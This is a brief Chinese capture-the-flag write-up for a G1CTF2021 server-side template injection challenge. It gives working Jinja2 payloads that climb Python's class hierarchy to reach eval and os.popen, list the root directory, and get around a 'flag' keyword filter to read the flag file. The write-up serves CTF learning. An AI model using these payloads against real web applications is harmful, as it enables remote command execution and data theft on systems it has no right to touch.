[G1CTF2021]SSTI – 作者:无名草talent

访问网址显示内容如下:

1622374633_60b378e9207daea38504d.png!small

输入{{7*7}}发现回显了49

1622374776_60b37978dc3104735bc4d.png!small

模板注入 。

模板注入解析:   https://xz.aliyun.com/t/7746

这里就不多解释了直接上payload:

{% for c in [].__class__.__base__.__subclasses__() %}
{%if%20c.__name__=='catch_warnings'%27'%}
{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('ls /').read()")}}
{%endif%}
{% endfor %}

1622376727_60b381170a65dc8580eb0.png!small

测试可知过滤flag,命令执行绕过得FLAG:

{% for c in [].__class__.__base__.__subclasses__() %}
{%if%20c.__name__=='catch_warnings'%27'%}
{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('cat /fla''g').read()")}}
{%endif%}
{% endfor %}

来源:freebuf.com 2021-05-30 20:23:19 by: 无名草talent

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论